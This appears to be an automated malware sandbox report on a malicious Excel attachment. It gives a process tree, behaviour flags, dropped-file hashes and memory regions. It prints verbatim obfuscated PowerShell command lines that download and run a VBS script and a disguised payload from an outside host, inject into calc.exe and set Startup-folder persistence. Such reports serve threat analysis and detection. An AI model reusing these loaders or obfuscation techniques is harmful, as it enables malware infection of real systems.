calc.exe cmd.exe PID 1460 wrote to memory of 1636 1460 cmd.exe timeout.exe PID 1460 wrote to memory of 1636 1460 cmd.exe timeout.exe PID 1460 wrote to memory of 1636 1460 cmd.exe timeout.exe PID 1460 wrote to memory of 1636 1460 cmd.exe timeout.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\ach payment 082422.xls"1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.sldnur\''+pmet:vne$,''sbv.tneilC/clac/nomwen/moc.ehgityennikcm//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX(([regex]::Matches($TC,'.','RightToLeft') | ForEach {$_.value}) -join '');start-process($env:temp+ '\rundls.vbs')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\rundls.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,01101101,01100011,01101011,01101001,01101110,01101110,01100101,01111001,01110100,01101001,01100111,01101000,01100101,00101110,01100011,01101111,01101101,00101111,01101110,01100101,01110111,01101101,01101111,01101110,00101111,01000101,01101110,01100011,01110010,01111001,01110000,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00100000,01001111,01000111,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='ZE000'.replace('Z','I').replace('000','x');sal P $o00;([system.String]::Join('', $gf))|P4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\WINDOWS\syswow64\calc.exe"C:\WINDOWS\syswow64\calc.exe"5⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\WINDOWS\syswow64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\PFHdfoIm.bat" "6⤵
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\SysWOW64\timeout.exetimeout /t 5 /nobreak7⤵
- Delays execution with timeout.exe
PID:1636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\rundls.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rundls.vbs'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1088 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1832
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\PFHdfoIm.batFilesize
270B
MD52a6755648663b393921ac86761c30e4f
SHA1230384213cd66afe3ac5a028f9e02fda0ada5413
SHA25601cfc24b7ebef3ebb6eda06380688cbaa7f80e19bf86b671d3e1f37c50d2b470
SHA512e81efd9f4a1ad7bc82e9131aed336d0a312c3d0954ee2df137f114696c176480e9daa5d2bad94ed733d74e33ff517e53ac04883a2cff0f71682154729f102656
-
C:\Users\Admin\AppData\Local\Temp\rundls.vbsFilesize
2KB
MD5bce33b78d45f9f86c00d35f0cbdeaa7c
SHA189f52ab70ec72cca1f69a8b6139fc3b7181d667c
SHA25632202bd660c1cbe597504f6108e09c74de842917aaf3ae88446712ec9be78209
SHA512fdd7af18ec9c94fe5708e8b277ade1036778e692e807649818cab6f5f585f73ff4cc616636f30c579956f5de11bd46290eeda77384d696478898b8c93528ae32
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD59bf657b275e3a74c2e57f66c1584550b
SHA167b180dc794f47b6905949ce145a273d86135268
SHA2562dd8d4b6cd4e067524efd9b0ed894f081c223c40d8a58990b1de6ab12d5ee040
SHA512c900fcb6695988e8b5835354712d92ba2a648f382a86a88e1b2479994fe1e50bdb2971d14f381e82d792eb1f4013c2d442e6fef9ff775611d47d03a4003cb47e
-
\Users\Admin\AppData\Local\Temp\28712958-7029-4eed-8e2f-deb7c107988f\AgileDotNetRT.dllFilesize
94KB
MD514ff402962ad21b78ae0b4c43cd1f194
SHA1f8a510eb26666e875a5bdd1cadad40602763ad72
SHA256fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b
SHA512daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b
-
memory/1184-79-0x0000000000000000-mapping.dmp
-
memory/1184-85-0x000000006C3A0000-0x000000006C94B000-memory.dmpFilesize
5.7MB
-
memory/1184-81-0x000000006C3A0000-0x000000006C94B000-memory.dmpFilesize
5.7MB
-
memory/1456-94-0x0000000068E80000-0x000000006942B000-memory.dmpFilesize
5.7MB
-
memory/1456-92-0x0000000004AD0000-0x0000000004B13000-memory.dmpFilesize
268KB
-
memory/1456-88-0x0000000000000000-mapping.dmp
-
memory/1460-115-0x0000000000000000-mapping.dmp
-
memory/1532-83-0x0000000000000000-mapping.dmp
-
memory/1576-101-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/1576-106-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/1576-100-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/1576-116-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/1576-114-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/1576-113-0x0000000000090000-0x000000000009A000-memory.dmpFilesize
40KB
-
memory/1576-112-0x0000000000090000-0x000000000009A000-memory.dmpFilesize
40KB
-
memory/1576-110-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/1576-108-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/1576-103-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/1576-104-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/1576-105-0x00000000007E2730-mapping.dmp
-
memory/1636-118-0x0000000000000000-mapping.dmp
-
memory/1640-107-0x0000000068E80000-0x000000006942B000-memory.dmpFilesize
5.7MB
-
memory/1640-87-0x0000000000000000-mapping.dmp
-
memory/1640-97-0x0000000002480000-0x00000000030CA000-memory.dmpFilesize
12.3MB
-
memory/1640-96-0x0000000068E80000-0x000000006942B000-memory.dmpFilesize
5.7MB
-
memory/1640-95-0x0000000068E80000-0x000000006942B000-memory.dmpFilesize
5.7MB
-
memory/1640-93-0x0000000002440000-0x0000000002483000-memory.dmpFilesize
268KB
-
memory/2024-78-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-67-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-60-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-62-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-59-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-58-0x0000000075F81000-0x0000000075F83000-memory.dmpFilesize
8KB
-
memory/2024-63-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-64-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-82-0x0000000072A2D000-0x0000000072A38000-memory.dmpFilesize
44KB
-
memory/2024-57-0x0000000072A2D000-0x0000000072A38000-memory.dmpFilesize
44KB
-
memory/2024-65-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-54-0x000000002FD51000-0x000000002FD54000-memory.dmpFilesize
12KB
-
memory/2024-66-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-61-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-77-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-76-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-75-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-74-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-73-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-72-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-71-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-70-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-56-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2024-69-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-55-0x0000000071A41000-0x0000000071A43000-memory.dmpFilesize
8KB
-
memory/2024-68-0x000000000065E000-0x0000000000662000-memory.dmpFilesize
16KB
-
memory/2024-119-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2024-120-0x0000000072A2D000-0x0000000072A38000-memory.dmpFilesize
44KB